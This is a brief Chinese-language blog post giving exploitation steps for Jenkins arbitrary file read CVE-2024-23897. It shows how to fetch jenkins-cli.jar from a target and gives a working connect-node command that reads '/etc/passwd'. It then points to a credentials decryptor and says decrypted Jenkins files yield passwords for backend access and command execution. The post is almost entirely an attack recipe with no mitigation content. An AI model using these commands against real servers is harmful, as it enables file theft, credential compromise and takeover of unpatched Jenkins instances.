互动

Jenkins 任意文件读取漏洞-CVE-2024-23897

Administrator 字数: 1920 阅读耗时: 4 分钟 2024/01/27 博客独享热度: 15 评论: 0

工具获取

官方描述在jenkins的链接后面加上 /jnlpJars/jenkins-cli.jar 即可获取

http://192.168.72.129:8080//jnlpJars/jenkins-cli.jar

java -jar jenkins-cli.jar -s http://192.168.72.129:8080 connect-node "@/etc/passwd"

https://github.com/hoto/jenkins-credentials-decryptor

找到 jenkins安装路径找到这三个文件解密会得到账号密码进入后台，即可执行命令
执行命令可以参考 : https://blog.putdown.top/archives/3580484b-3ef1-4194-9d48-bcd4fdf01f92

原创 Jenkins 任意文件读取漏洞-CVE-2024-23897

Jenkins 任意文件读取漏洞-CVE-2024-23897

本文是原创文章，采用 CC BY-NC-ND 4.0 协议，完整转载请注明来自 putdown.top